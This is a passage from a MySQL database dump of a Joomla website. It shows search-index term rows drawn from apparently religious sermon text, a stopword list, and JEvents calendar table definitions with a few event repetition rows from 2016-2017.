(328406, 'w isdom', 'w isdom', 0, 1, 1.2333, 'W235', 1, '*'),
(328407, 'w isdom account', 'w isdom account', 0, 1, 1.5, 'W235253', 1, '*'),
(328408, 'walk on foot', 'walk on foot', 0, 1, 1.4, 'W42513', 1, '*'),
(328409, 'walkable', 'walkabl', 0, 0, 0.5333, 'W4214', 1, '*'),
(328410, 'was a deliberate', 'wa a deliberate', 0, 1, 1.5333, 'W234163', 1, '*'),
(328411, 'was about', 'wa about', 0, 1, 1.3, 'W213', 1, '*'),
(328412, 'was about to', 'wa about to', 0, 1, 1.4, 'W213', 1, '*'),
(328413, 'was clear', 'wa clear', 0, 1, 1.3, 'W246', 1, '*'),
(328414, 'was clear that', 'wa clear that', 0, 1, 1.4667, 'W2463', 1, '*'),
(328415, 'was in error', 'wa in error', 0, 1, 1.4, 'W256', 1, '*'),
(328416, 'was in essence', 'wa in essence', 0, 1, 1.4667, 'W25252', 1, '*'),
(328417, 'was not accidental', 'wa not accidental', 0, 1, 1.6, 'W25323534', 1, '*'),
(328418, 'was speaking', 'wa speaking', 0, 1, 1.4, 'W21252', 1, '*'),
(328419, 'was speaking through', 'wa speaking through', 0, 1, 1.6667, 'W21252362', 1, '*'),
(328420, 'was the devil', 'wa the devil', 0, 1, 1.4333, 'W2314', 1, '*'),
(328421, 'was the wisdom', 'wa the wisdom', 0, 1, 1.4667, 'W23235', 1, '*'),
(328422, 'was using', 'wa using', 0, 1, 1.3, 'W252', 1, '*'),
(328423, 'was using all', 'wa using all', 0, 1, 1.4333, 'W2524', 1, '*'),
(328424, 'was what mordecai', 'wa what mordecai', 0, 1, 1.5667, 'W235632', 1, '*'),
(328425, 'watching it', 'watch it', 0, 1, 1.3667, 'W32523', 1, '*'),
(328426, 'watching it and', 'watch it and', 0, 1, 1.5, 'W3252353', 1, '*'),
(328427, 'we are here', 'we are here', 0, 1, 1.3667, 'W600', 1, '*'),
(328428, 'we are on', 'we are on', 0, 1, 1.3, 'W650', 1, '*'),
(328429, 'we live', 'we live', 0, 1, 1.2333, 'W410', 1, '*'),
(328430, 'we live the', 'we live the', 0, 1, 1.3667, 'W413', 1, '*'),
(328431, 'wealth god', 'wealth god', 0, 1, 1.3333, 'W4323', 1, '*'),
(328432, 'wealth god is', 'wealth god is', 0, 1, 1.4333, 'W43232', 1, '*'),
(328433, 'wealthy but', 'wealthi but', 0, 1, 1.3667, 'W4313', 1, '*'),
(328434, 'wealthy but he', 'wealthi but he', 0, 1, 1.4667, 'W4313', 1, '*'),
(328435, 'were born god', 'were born god', 0, 1, 1.4333, 'W616523', 1, '*'),
(328436, 'were opened', 'were opened', 0, 1, 1.3667, 'W6153', 1, '*'),
(328437, 'were opened on', 'were opened on', 0, 1, 1.4667, 'W61535', 1, '*'),
(328438, 'what god funds', 'what god funds', 0, 1, 1.4667, 'W3231532', 1, '*'),
(328439, 'what god planned', 'what god planned', 0, 1, 1.5333, 'W3231453', 1, '*'),
(328440, 'what mordecai', 'what mordecai', 0, 1, 1.4333, 'W35632', 1, '*'),
(328441, 'what mordecai told', 'what mordecai told', 0, 1, 1.6, 'W35632343', 1, '*'),
(328442, 'whatever your assignment', 'whatev your assignment', 0, 1, 1.8, 'W316253', 1, '*'),
(328443, 'when people', 'when people', 0, 1, 1.3667, 'W514', 1, '*'),
(328444, 'when people get', 'when people get', 0, 1, 1.5, 'W51423', 1, '*'),
(328445, 'when you got', 'when you got', 0, 1, 1.4, 'W523', 1, '*'),
(328446, 'when your faith', 'when your faith', 0, 1, 1.5, 'W5613', 1, '*'),
(328447, 'where jesus', 'where jesus', 0, 1, 1.3667, 'W620', 1, '*'),
(328448, 'where jesus could', 'where jesus could', 0, 1, 1.5667, 'W6243', 1, '*'),
(328449, 'where will', 'where will', 0, 1, 1.3333, 'W640', 1, '*'),
(328450, 'where will i', 'where will i', 0, 1, 1.4, 'W640', 1, '*'),
(328451, 'whether it', 'whether it', 0, 1, 1.3333, 'W363', 1, '*'),
(328452, 'whether it is', 'whether it is', 0, 1, 1.4333, 'W3632', 1, '*'),
(328453, 'whether you have', 'whether you have', 0, 1, 1.5333, 'W361', 1, '*'),
(328454, 'which of the', 'which of the', 0, 1, 1.4, 'W213', 1, '*'),
(328455, 'while we', 'while we', 0, 1, 1.2667, 'W400', 1, '*'),
(328456, 'while we are', 'while we are', 0, 1, 1.4, 'W460', 1, '*'),
(328457, 'who knows whether', 'who knows whether', 0, 1, 1.5667, 'W25236', 1, '*'),
(328458, 'who was', 'who was', 0, 1, 1.2333, 'W200', 1, '*'),
(328459, 'who was going', 'who was going', 0, 1, 1.4333, 'W252', 1, '*'),
(328460, 'who was in', 'who was in', 0, 1, 1.3333, 'W250', 1, '*'),
(328461, 'why your father', 'why your father', 0, 1, 1.5, 'W6136', 1, '*'),
(328462, 'will be increasing', 'will be increasing', 0, 1, 1.6, 'W41526252', 1, '*'),
(328463, 'will bring', 'will bring', 0, 1, 1.3333, 'W41652', 1, '*'),
(328464, 'will bring cross', 'will bring cross', 0, 1, 1.5333, 'W4165262', 1, '*'),
(328465, 'will carry', 'will carry', 0, 1, 1.3333, 'W426', 1, '*'),
(328466, 'will carry your', 'will carry your', 0, 1, 1.5, 'W426', 1, '*'),
(328467, 'will have', 'will have', 0, 1, 1.3, 'W410', 1, '*'),
(328468, 'will have how', 'will have how', 0, 1, 1.4333, 'W410', 1, '*'),
(328469, 'will i', 'will i', 0, 1, 1.2, 'W400', 1, '*'),
(328470, 'will i get', 'will i get', 0, 1, 1.3333, 'W423', 1, '*'),
(328471, 'will i park', 'will i park', 0, 1, 1.3667, 'W4162', 1, '*'),
(328472, 'will promote', 'will promote', 0, 1, 1.4, 'W41653', 1, '*'),
(328473, 'will promote you', 'will promote you', 0, 1, 1.5333, 'W41653', 1, '*'),
(328474, 'will send', 'will send', 0, 1, 1.3, 'W4253', 1, '*'),
(328475, 'will send one', 'will send one', 0, 1, 1.4333, 'W42535', 1, '*'),
(328476, 'wisdom account', 'wisdom account', 0, 1, 1.4667, 'W235253', 1, '*'),
(328477, 'wisdom account that', 'wisdom account that', 0, 1, 1.6333, 'W235253', 1, '*'),
(328478, 'wisdom is ability', 'wisdom is ability', 0, 1, 1.5667, 'W2352143', 1, '*'),
(328479, 'wisdom somewhere', 'wisdom somewhere', 0, 1, 1.5333, 'W235256', 1, '*'),
(328480, 'wisdom somewhere but', 'wisdom somewhere but', 0, 1, 1.6667, 'W23525613', 1, '*'),
(328481, 'wisdom that', 'wisdom that', 0, 1, 1.3667, 'W2353', 1, '*'),
(328482, 'wisdom that you', 'wisdom that you', 0, 1, 1.5, 'W2353', 1, '*'),
(328483, 'wise wisdom', 'wise wisdom', 0, 1, 1.3667, 'W235', 1, '*'),
(328484, 'wise wisdom is', 'wise wisdom is', 0, 1, 1.4667, 'W2352', 1, '*'),
(328485, 'with god there', 'with god there', 0, 1, 1.4667, 'W3236', 1, '*'),
(328486, 'with the people', 'with the people', 0, 1, 1.5, 'W314', 1, '*'),
(328487, 'with the purpose', 'with the purpose', 0, 1, 1.5333, 'W31612', 1, '*'),
(328488, 'with your calling', 'with your calling', 0, 1, 1.5667, 'W362452', 1, '*'),
(328489, 'womb for jesus', 'womb for jesus', 0, 1, 1.4667, 'W5162', 1, '*'),
(328490, 'won\'t cast', 'won cast', 0, 1, 1.3333, 'W5323', 1, '*'),
(328491, 'won\'t cast your', 'won cast your', 0, 1, 1.5, 'W53236', 1, '*'),
(328492, 'would give', 'would give', 0, 1, 1.3333, 'W4321', 1, '*'),
(328493, 'would give me', 'would give me', 0, 1, 1.4333, 'W43215', 1, '*'),
(328494, 'would have been', 'would have been', 0, 1, 1.5, 'W4315', 1, '*'),
(328495, 'wrong discipleship', 'wrong discipleship', 0, 1, 1.6, 'W652321421', 1, '*'),
(328496, 'wrong discipleship comes', 'wrong discipleship comes', 0, 1, 1.8, 'W652321421252', 1, '*'),
(328497, 'wrong purposes', 'wrong purposes', 0, 1, 1.4667, 'W6521612', 1, '*'),
(328498, 'wrong purposes there', 'wrong purposes there', 0, 1, 1.6667, 'W652161236', 1, '*'),
(328499, 'y', 'y', 0, 0, 0.0667, 'Y000', 1, '*'),
(328500, 'y the', 'y the', 0, 1, 1.1667, 'Y300', 1, '*'),
(328501, 'y the assignment', 'y the assignment', 0, 1, 1.5333, 'Y3253', 1, '*'),
(328502, 'year i have', 'year i have', 0, 1, 1.3667, 'Y610', 1, '*'),
(328503, 'years and in', 'year and in', 0, 1, 1.4, 'Y62535', 1, '*'),
(328504, 'yet who', 'yet who', 0, 1, 1.2333, 'Y300', 1, '*'),
(328505, 'yet who knows', 'yet who knows', 0, 1, 1.4333, 'Y3252', 1, '*'),
(328506, 'you a sister', 'you a sister', 0, 1, 1.4, 'Y236', 1, '*'),
(328507, 'you are anointed', 'you are anointed', 0, 1, 1.5333, 'Y653', 1, '*'),
(328508, 'you are here', 'you are here', 0, 1, 1.4, 'Y600', 1, '*'),
(328509, 'you as a', 'you as a', 0, 1, 1.2667, 'Y200', 1, '*'),
(328510, 'you at your', 'you at your', 0, 1, 1.3667, 'Y360', 1, '*'),
(328511, 'you cannot cast', 'you cannot cast', 0, 1, 1.5, 'Y25323', 1, '*'),
(328512, 'you don\'t connect', 'you don connect', 0, 1, 1.5667, 'Y3532523', 1, '*'),
(328513, 'you find your', 'you find your', 0, 1, 1.4333, 'Y1536', 1, '*'),
(328514, 'you for a', 'you for a', 0, 1, 1.3, 'Y160', 1, '*'),
(328515, 'you got', 'you got', 0, 1, 1.2333, 'Y230', 1, '*'),
(328516, 'you got born', 'you got born', 0, 1, 1.4, 'Y23165', 1, '*'),
(328517, 'you have an', 'you have an', 0, 1, 1.3667, 'Y150', 1, '*'),
(328518, 'you have come', 'you have come', 0, 1, 1.4333, 'Y125', 1, '*'),
(328519, 'you have if', 'you have if', 0, 1, 1.3667, 'Y100', 1, '*'),
(328520, 'you have that', 'you have that', 0, 1, 1.4333, 'Y130', 1, '*'),
(328521, 'you in a', 'you in a', 0, 1, 1.2667, 'Y500', 1, '*'),
(328522, 'you know it', 'you know it', 0, 1, 1.3667, 'Y253', 1, '*'),
(328523, 'you know that\'s', 'you know that', 0, 1, 1.5, 'Y2532', 1, '*'),
(328524, 'you musthave', 'you musthave', 0, 1, 1.4, 'Y5231', 1, '*'),
(328525, 'you musthave a', 'you musthave a', 0, 1, 1.4667, 'Y5231', 1, '*'),
(328526, 'you see and', 'you see and', 0, 1, 1.3667, 'Y253', 1, '*'),
(328527, 'you see in', 'you see in', 0, 1, 1.3333, 'Y250', 1, '*'),
(328528, 'you tend', 'you tend', 0, 1, 1.2667, 'Y353', 1, '*'),
(328529, 'you tend to', 'you tend to', 0, 1, 1.3667, 'Y353', 1, '*'),
(328530, 'you think about', 'you think about', 0, 1, 1.5, 'Y35213', 1, '*'),
(328531, 'you wealthy', 'you wealthy', 0, 1, 1.3667, 'Y430', 1, '*'),
(328532, 'you wealthy but', 'you wealthy but', 0, 1, 1.5, 'Y4313', 1, '*'),
(328533, 'you will carry', 'you will carry', 0, 1, 1.4667, 'Y426', 1, '*'),
(328534, 'you won\'t cast', 'you won cast', 0, 1, 1.4667, 'Y5323', 1, '*'),
(328535, 'you.” different', 'you.” different', 0, 1, 1.5, 'Y31653', 1, '*'),
(328536, 'you.” different accounts', 'you.” different accounts', 0, 1, 1.8, 'Y316532532', 1, '*'),
(328537, 'your advantage', 'your advantage', 0, 1, 1.4667, 'Y631532', 1, '*'),
(328538, 'your advantage and', 'your advantage and', 0, 1, 1.6, 'Y63153253', 1, '*'),
(328539, 'your assignment in', 'your assignment in', 0, 1, 1.6, 'Y62535', 1, '*'),
(328540, 'your assignment it\'s', 'your assignment it', 0, 1, 1.6667, 'Y62532', 1, '*'),
(328541, 'your assignment on', 'your assignment on', 0, 1, 1.6, 'Y62535', 1, '*'),
(328542, 'your assignment so', 'your assignment so', 0, 1, 1.6, 'Y62532', 1, '*'),
(328543, 'your assignment understand', 'your assignment understand', 0, 1, 1.8667, 'Y62535362353', 1, '*'),
(328544, 'your bank', 'your bank', 0, 1, 1.3, 'Y6152', 1, '*'),
(328545, 'your bank account', 'your bank account', 0, 1, 1.5667, 'Y615253', 1, '*'),
(328546, 'your behalf', 'your behalf', 0, 1, 1.3667, 'Y6141', 1, '*'),
(328547, 'your behalf but', 'your behalf but', 0, 1, 1.5, 'Y61413', 1, '*'),
(328548, 'your calling an', 'your calling an', 0, 1, 1.5, 'Y624525', 1, '*'),
(328549, 'your care', 'your care', 0, 1, 1.3, 'Y626', 1, '*'),
(328550, 'your care ask', 'your care ask', 0, 1, 1.4333, 'Y6262', 1, '*'),
(328551, 'your care on', 'your care on', 0, 1, 1.4, 'Y6265', 1, '*'),
(328552, 'your care yourself', 'your care yourself', 0, 1, 1.6, 'Y626241', 1, '*'),
(328553, 'your destiny god', 'your destiny god', 0, 1, 1.5333, 'Y6323523', 1, '*'),
(328554, 'your faith grows', 'your faith grows', 0, 1, 1.5333, 'Y613262', 1, '*'),
(328555, 'your faith is', 'your faith is', 0, 1, 1.4333, 'Y6132', 1, '*'),
(328556, 'your father', 'your father', 0, 1, 1.3667, 'Y6136', 1, '*'),
(328557, 'your father died', 'your father died', 0, 1, 1.5333, 'Y61363', 1, '*'),
(328558, 'your fear', 'your fear', 0, 1, 1.3, 'Y616', 1, '*'),
(328559, 'your fear upon', 'your fear upon', 0, 1, 1.4667, 'Y61615', 1, '*'),
(328560, 'your job', 'your job', 0, 1, 1.2667, 'Y621', 1, '*'),
(328561, 'your job supernaturally', 'your job supernaturally', 0, 1, 1.7667, 'Y6212165364', 1, '*'),
(328562, 'your journey and', 'your journey and', 0, 1, 1.5333, 'Y62653', 1, '*'),
(328563, 'your knowledge', 'your knowledge', 0, 1, 1.4667, 'Y625432', 1, '*'),
(328564, 'your knowledge beyond', 'your knowledge beyond', 0, 1, 1.7, 'Y625432153', 1, '*'),
(328565, 'your life belongs', 'your life belongs', 0, 1, 1.5667, 'Y641452', 1, '*'),
(328566, 'your life comfortable', 'your life comfortable', 0, 1, 1.7, 'Y6412516314', 1, '*'),
(328567, 'your obedience and', 'your obedience and', 0, 1, 1.6, 'Y6135253', 1, '*'),
(328568, 'your path', 'your path', 0, 1, 1.3, 'Y613', 1, '*'),
(328569, 'your path for', 'your path for', 0, 1, 1.4333, 'Y61316', 1, '*'),
(328570, 'your steps', 'your steps', 0, 1, 1.3333, 'Y62312', 1, '*'),
(328571, 'your steps divine', 'your steps divine', 0, 1, 1.5667, 'Y62312315', 1, '*'),
(328572, 'your training this', 'your training this', 0, 1, 1.6, 'Y6365232', 1, '*'),
(328573, 'yourself it takes', 'yourself it takes', 0, 1, 1.5667, 'Y624132', 1, '*'),
(328574, 'yourself which', 'yourself which', 0, 1, 1.4667, 'Y62412', 1, '*'),
(328575, 'yourself which of', 'yourself which of', 0, 1, 1.5667, 'Y624121', 1, '*'),
(328576, '“...', '“...', 0, 0, 0.2667, '“000', 1, '*'),
(328577, '“... maybe', '“... maybe', 0, 1, 1.3333, '“510', 1, '*'),
(328578, '“... maybe you', '“... maybe you', 0, 1, 1.4667, '“510', 1, '*'),
(328579, '“it', '“it', 0, 0, 0.2, '“300', 1, '*'),
(328580, '“it means', '“it means', 0, 1, 1.3, '“352', 1, '*'),
(328581, '“it means you', '“it means you', 0, 1, 1.4333, '“352', 1, '*'),
(328911, '63', '63', 0, 0, 0.2, '', 1, '*'),
(328912, '63 sensitivity', '63 sensitivity', 0, 1, 1.4667, 'S52313', 1, '*'),
(328913, 'a genuine minister', 'a genuine minister', 0, 1, 1.6, 'A25236', 1, '*'),
(328914, 'and calling of', 'and calling of', 0, 1, 1.4667, 'A5324521', 1, '*'),
(328915, 'anointed atmosphere', 'anoint atmosphere', 0, 1, 1.6333, 'A535216', 1, '*'),
(328916, 'anointed atmosphere create', 'anoint atmosphere create', 0, 1, 1.8667, 'A535216263', 1, '*'),
(328917, 'atmosphere create', 'atmospher create', 0, 1, 1.5667, 'A35216263', 1, '*'),
(328918, 'atmosphere create an', 'atmospher create an', 0, 1, 1.6667, 'A352162635', 1, '*'),
(328919, 'authentic gift', 'authent gift', 0, 1, 1.4667, 'A353213', 1, '*'),
(328920, 'authentic gift and', 'authent gift and', 0, 1, 1.6, 'A35321353', 1, '*'),
(328921, 'away from un', 'awai from un', 0, 1, 1.4, 'A165', 1, '*'),
(328922, 'calling of the', 'call of the', 0, 1, 1.4667, 'C45213', 1, '*'),
(328923, 'conscience learning', 'conscienc learning', 0, 1, 1.6333, 'C52524652', 1, '*'),
(328924, 'conscience learning to', 'conscienc learning to', 0, 1, 1.7333, 'C525246523', 1, '*'),
(328925, 'falsehood find a', 'falsehood find a', 0, 1, 1.5333, 'F423153', 1, '*'),
(328926, 'find a', 'find a', 0, 1, 1.2, 'F530', 1, '*'),
(328927, 'find a genuine', 'find a genuine', 0, 1, 1.4667, 'F5325', 1, '*'),
(328928, 'from un', 'from un', 0, 1, 1.2333, 'F650', 1, '*'),
(328929, 'from un anointed', 'from un anointed', 0, 1, 1.5333, 'F653', 1, '*'),
(328930, 'genuine minister', 'genuin minister', 0, 1, 1.5333, 'G5236', 1, '*'),
(328931, 'genuine minister around', 'genuin minister around', 0, 1, 1.7667, 'G523653', 1, '*'),
(328932, 'gift and', 'gift and', 0, 1, 1.2667, 'G1353', 1, '*'),
(328933, 'gift and calling', 'gift and calling', 0, 1, 1.5333, 'G13532452', 1, '*'),
(328934, 'item 63', 'item 63', 0, 1, 1.2333, 'I350', 1, '*'),
(328935, 'item 63 sensitivity', 'item 63 sensitivity', 0, 1, 1.6333, 'I35252313', 1, '*'),
(328936, 'k2 item 63', 'k2 item 63', 0, 1, 1.3333, 'K350', 1, '*'),
(328937, 'learning', 'learn', 0, 0, 0.5333, 'L652', 1, '*'),
(328938, 'learning to', 'learn to', 0, 1, 1.3667, 'L6523', 1, '*'),
(328939, 'learning to rebuke', 'learn to rebuke', 0, 1, 1.6, 'L6523612', 1, '*'),
(328940, 'malice offences', 'malic offences', 0, 1, 1.5, 'M42152', 1, '*'),
(328941, 'malice offences are', 'malic offences are', 0, 1, 1.6333, 'M421526', 1, '*'),
(328942, 'minister around', 'minist around', 0, 1, 1.5, 'M23653', 1, '*'),
(328943, 'minister around you', 'minist around you', 0, 1, 1.6333, 'M23653', 1, '*'),
(328944, 'negative passion reduces', 'neg passion reduces', 0, 1, 1.8, 'N23125632', 1, '*'),
(328945, 'offences are', 'offenc are', 0, 1, 1.4, 'O1526', 1, '*'),
(328946, 'offences are all', 'offenc are all', 0, 1, 1.5333, 'O15264', 1, '*'),
(328947, 'passion reduces', 'passion reduces', 0, 1, 1.5, 'P25632', 1, '*'),
(328948, 'passion reduces spiritual', 'passion reduces spiritual', 0, 1, 1.8333, 'P256321634', 1, '*'),
(328949, 'reduces spiritual', 'reduc spiritual', 0, 1, 1.5667, 'R321634', 1, '*'),
(328950, 'reduces spiritual sensitivity', 'reduc spiritual sensitivity', 0, 1, 1.9667, 'R321634252313', 1, '*'),
(328951, 'un', 'un', 0, 0, 0.1333, 'U500', 1, '*'),
(328952, 'un anointed', 'un anointed', 0, 1, 1.3667, 'U530', 1, '*'),
(328953, 'un anointed atmosphere', 'un anointed atmosphere', 0, 1, 1.7333, 'U535216', 1, '*'),
(328954, 'with authentic gift', 'with authentic gift', 0, 1, 1.6333, 'W353213', 1, '*'),
(328955, 'wrath malice offences', 'wrath malice offences', 0, 1, 1.7, 'W63542152', 1, '*'),
(328956, 'you negative passion', 'you negative passion', 0, 1, 1.6667, 'Y523125', 1, '*'),
(328957, 'your conscience learning', 'your conscience learning', 0, 1, 1.8, 'Y6252524652', 1, '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_terms_common`
--

CREATE TABLE `y57u5_finder_terms_common` (
  `term` varchar(75) NOT NULL,
  `language` varchar(3) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_terms_common`
--

INSERT INTO `y57u5_finder_terms_common` (`term`, `language`) VALUES
('a', 'en'),
('about', 'en'),
('after', 'en'),
('ago', 'en'),
('all', 'en'),
('am', 'en'),
('an', 'en'),
('and', 'en'),
('ani', 'en'),
('any', 'en'),
('are', 'en'),
('aren\'t', 'en'),
('as', 'en'),
('at', 'en'),
('be', 'en'),
('but', 'en'),
('by', 'en'),
('for', 'en'),
('from', 'en'),
('get', 'en'),
('go', 'en'),
('how', 'en'),
('if', 'en'),
('in', 'en'),
('into', 'en'),
('is', 'en'),
('isn\'t', 'en'),
('it', 'en'),
('its', 'en'),
('me', 'en'),
('more', 'en'),
('most', 'en'),
('must', 'en'),
('my', 'en'),
('new', 'en'),
('no', 'en'),
('none', 'en'),
('not', 'en'),
('noth', 'en'),
('nothing', 'en'),
('of', 'en'),
('off', 'en'),
('often', 'en'),
('old', 'en'),
('on', 'en'),
('onc', 'en'),
('once', 'en'),
('onli', 'en'),
('only', 'en'),
('or', 'en'),
('other', 'en'),
('our', 'en'),
('ours', 'en'),
('out', 'en'),
('over', 'en'),
('page', 'en'),
('she', 'en'),
('should', 'en'),
('small', 'en'),
('so', 'en'),
('some', 'en'),
('than', 'en'),
('thank', 'en'),
('that', 'en'),
('the', 'en'),
('their', 'en'),
('theirs', 'en'),
('them', 'en'),
('then', 'en'),
('there', 'en'),
('these', 'en'),
('they', 'en'),
('this', 'en'),
('those', 'en'),
('thus', 'en'),
('time', 'en'),
('times', 'en'),
('to', 'en'),
('too', 'en'),
('true', 'en'),
('under', 'en'),
('until', 'en'),
('up', 'en'),
('upon', 'en'),
('use', 'en'),
('user', 'en'),
('users', 'en'),
('veri', 'en'),
('version', 'en'),
('very', 'en'),
('via', 'en'),
('want', 'en'),
('was', 'en'),
('way', 'en'),
('were', 'en'),
('what', 'en'),
('when', 'en'),
('where', 'en'),
('whi', 'en'),
('which', 'en'),
('who', 'en'),
('whom', 'en'),
('whose', 'en'),
('why', 'en'),
('wide', 'en'),
('will', 'en'),
('with', 'en'),
('within', 'en'),
('without', 'en'),
('would', 'en'),
('yes', 'en'),
('yet', 'en'),
('you', 'en'),
('your', 'en'),
('yours', 'en');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_tokens`
--

CREATE TABLE `y57u5_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `phrase` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `weight` float UNSIGNED NOT NULL DEFAULT '1',
  `context` tinyint(1) UNSIGNED NOT NULL DEFAULT '2',
  `language` char(3) NOT NULL DEFAULT ''
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_tokens_aggregate`
--

CREATE TABLE `y57u5_finder_tokens_aggregate` (
  `term_id` int(10) UNSIGNED NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `phrase` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `term_weight` float UNSIGNED NOT NULL,
  `context` tinyint(1) UNSIGNED NOT NULL DEFAULT '2',
  `context_weight` float UNSIGNED NOT NULL,
  `total_weight` float UNSIGNED NOT NULL,
  `language` char(3) NOT NULL DEFAULT ''
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_types`
--

CREATE TABLE `y57u5_finder_types` (
  `id` int(10) UNSIGNED NOT NULL,
  `title` varchar(100) NOT NULL,
  `mime` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_types`
--

INSERT INTO `y57u5_finder_types` (`id`, `title`, `mime`) VALUES
(1, 'Event', ''),
(2, 'K2 Item', ''),
(3, 'Tag', ''),
(4, 'Category', ''),
(5, 'Contact', ''),
(6, 'Article', ''),
(7, 'News Feed', '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_categories`
--

CREATE TABLE `y57u5_jevents_categories` (
  `id` int(12) NOT NULL DEFAULT '0',
  `color` varchar(8) NOT NULL DEFAULT '',
  `overlaps` tinyint(3) NOT NULL DEFAULT '0',
  `admin` int(12) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_catmap`
--

CREATE TABLE `y57u5_jevents_catmap` (
  `evid` int(12) NOT NULL,
  `catid` int(11) NOT NULL DEFAULT '1',
  `ordering` int(5) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_catmap`
--

INSERT INTO `y57u5_jevents_catmap` (`evid`, `catid`, `ordering`) VALUES
(1, 30, 0),
(2, 30, 0),
(3, 30, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_exception`
--

CREATE TABLE `y57u5_jevents_exception` (
  `ex_id` int(12) NOT NULL,
  `rp_id` int(12) NOT NULL DEFAULT '0',
  `eventid` int(12) NOT NULL DEFAULT '1',
  `eventdetail_id` int(12) NOT NULL DEFAULT '0',
  `exception_type` int(2) NOT NULL DEFAULT '0',
  `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `oldstartrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `tempfield` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_filtermap`
--

CREATE TABLE `y57u5_jevents_filtermap` (
  `fid` int(12) NOT NULL,
  `userid` int(12) NOT NULL DEFAULT '0',
  `filters` text NOT NULL,
  `md5` varchar(255) NOT NULL,
  `andor` tinyint(3) NOT NULL DEFAULT '0',
  `modid` int(12) NOT NULL DEFAULT '0',
  `name` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_icsfile`
--

CREATE TABLE `y57u5_jevents_icsfile` (
  `ics_id` int(12) NOT NULL,
  `srcURL` varchar(500) NOT NULL DEFAULT '',
  `label` varchar(30) NOT NULL DEFAULT '',
  `filename` varchar(120) NOT NULL DEFAULT '',
  `icaltype` tinyint(3) NOT NULL DEFAULT '0',
  `isdefault` tinyint(3) NOT NULL DEFAULT '0',
  `ignoreembedcat` tinyint(3) NOT NULL DEFAULT '0',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `access` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(100) NOT NULL DEFAULT '',
  `modified_by` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `autorefresh` tinyint(3) NOT NULL DEFAULT '0',
  `overlaps` tinyint(3) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_icsfile`
--

INSERT INTO `y57u5_jevents_icsfile` (`ics_id`, `srcURL`, `label`, `filename`, `icaltype`, `isdefault`, `ignoreembedcat`, `state`, `access`, `catid`, `created`, `created_by`, `created_by_alias`, `modified_by`, `refreshed`, `autorefresh`, `overlaps`) VALUES
(1, '', 'Default', 'Initial ICS File', 2, 1, 0, 1, 1, 30, '0000-00-00 00:00:00', 0, '', 0, '0000-00-00 00:00:00', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_repbyday`
--

CREATE TABLE `y57u5_jevents_repbyday` (
  `rptday` date NOT NULL DEFAULT '0000-00-00',
  `rp_id` int(12) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_repetition`
--

CREATE TABLE `y57u5_jevents_repetition` (
  `rp_id` int(12) NOT NULL,
  `eventid` int(12) NOT NULL DEFAULT '1',
  `eventdetail_id` int(12) NOT NULL DEFAULT '0',
  `duplicatecheck` varchar(32) NOT NULL DEFAULT '',
  `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `endrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_repetition`
--

INSERT INTO `y57u5_jevents_repetition` (`rp_id`, `eventid`, `eventdetail_id`, `duplicatecheck`, `startrepeat`, `endrepeat`) VALUES
(9, 1, 1, '0cb0c54170aeb458c863933911d6cd62', '2016-12-22 08:00:00', '2016-12-22 23:59:59'),
(11, 2, 2, 'bb964b7b8d236c688cd1ade82b9ca938', '2016-11-19 08:00:00', '2016-11-19 23:59:59'),
(10, 3, 3, 'bcf143fa90096b2b193c178dbcab6301', '2016-09-09 08:00:00', '2016-09-09 17:00:00'),
(12, 4, 4, '871e940176c99b1ec3cf6c0ea53aca8f', '2016-08-31 08:00:00', '2016-08-31 17:00:00'),
(13, 5, 5, '522324853dfa28332d3f5b3e69c915af', '2016-09-19 08:00:00', '2016-09-19 17:00:00'),
(14, 6, 6, 'c35f690832bd7b069cddc29b0f50f865', '2017-01-01 08:00:00', '2017-01-01 13:00:00'),
